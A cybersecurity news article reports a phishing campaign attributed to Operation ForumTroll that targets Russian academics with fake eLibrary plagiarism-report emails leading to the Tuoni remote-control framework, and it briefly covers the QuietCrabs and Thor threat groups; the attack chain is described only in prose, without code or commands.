A new wave of phishing attacks is targeting a very specific group—Russian scholars—in a way that reveals both cunning preparation and focused intent. But here’s where it gets controversial: these attacks exploit trusted scientific platforms, raising questions about the ethics and scale of cyber espionage.
Kaspersky, a well-known Russian cybersecurity firm, recently uncovered a fresh campaign linked to the infamous Operation ForumTroll, which has been active since at least 2022. While earlier phases of ForumTroll zeroed in on organizations, this latest assault, detected in October 2025, shifts its gaze sharply toward individuals—particularly professors and researchers in political science, international relations, and global economics at prominent Russian universities and research centers.
Why the shift? According to security analyst Georgy Kucherin, pinpointing individuals suggests a more strategic approach, likely aimed at extracting highly specialized information or monitoring influential voices. This is a significant evolution from the broad brush tactics typical in many phishing schemes.
Operation ForumTroll originally gained notoriety for leveraging a then-zero-day Google Chrome vulnerability (CVE-2025-2783) to deploy malware like the LeetAgent backdoor and Dante spyware. This new campaign continues the trend of exploiting sophisticated tools, but the entry point is notably different: carefully crafted emails pretending to come from "eLibrary," a respected Russian scientific electronic library.
The attackers registered the fake domain "support@e-library[.]wiki" back in March 2025, half a year before launching the attacks. This deliberate waiting period, known as domain aging, is a sneaky tactic used to make phishing emails appear more legitimate, as freshly created domains are often flagged and blocked by email security systems.
To further bolster the illusion, the attackers cloned the real eLibrary homepage (elibrary[.]ru) on their fake site, tricking recipients into believing the messages were authentic. The phishing emails urge victims to download a plagiarism report, linking to a ZIP file named precisely after the target’s full Russian name — last name, first name, and patronymic — making the attack deeply personalized.
One clever detail: these download links only work once and only on Windows devices. If someone tries to use the link again or from another operating system, they receive a polite Russian message saying "Download failed, please try again later" or a prompt to retry on a Windows PC. This single-use approach minimizes traces and keeps the attack under the radar.
Inside the ZIP archive, victims find a Windows shortcut (LNK) file, which—when executed—runs a PowerShell script. This script silently downloads a malicious payload from a remote server that eventually installs a harmful DLL through a technique called COM hijacking. Meanwhile, the user is served a decoy PDF to distract them from noticing anything suspicious.
This final malware stage is the Tuoni framework, a powerful command-and-control platform used for red teaming—essentially giving attackers full remote control over infected Windows machines. The implication is chilling: this toolkit can be used for espionage, data theft, or even sabotage.
Kaspersky emphasizes that Operation ForumTroll’s persistent focus on Russian and Belarusian targets means this campaign is unlikely to be the last. Their ongoing operations pose serious risks to academic and governmental communities alike.
Adding another layer of complexity, Positive Technologies recently reported on two other active threat clusters: QuietCrabs, believed to be a Chinese hacking group also known as UTA0178 or UNC5221, and Thor, which has been linked to ransomware attacks since mid-2025. Both have exploited critical vulnerabilities in well-known enterprise software like Microsoft SharePoint and Ivanti products.
QuietCrabs employs a method where an initial foothold is used to deploy web shells that load further payloads, including the KrustyLoader which installs the Sliver implant—an increasingly popular open-source offensive tool. Meanwhile, Thor targets Russian companies with ransomware including LockBit and Babuk, supplemented by tools like Tactical RMM and MeshAgent to maintain stealthy persistence.
This growing landscape of targeted cyberattacks begs the question: How much more prepared are institutions and individuals to defend against such tailored and evolving threats? And are the implications of personalized academic targeting being fully grasped by the cybersecurity community?
What do you think—are these intelligent, targeted strikes a justified part of cyber intelligence gathering, or do they cross dangerous ethical boundaries? Share your thoughts below and join the conversation.
For those interested in staying updated on these critical developments, you can follow the latest threats and research on Google News, Twitter, and LinkedIn.
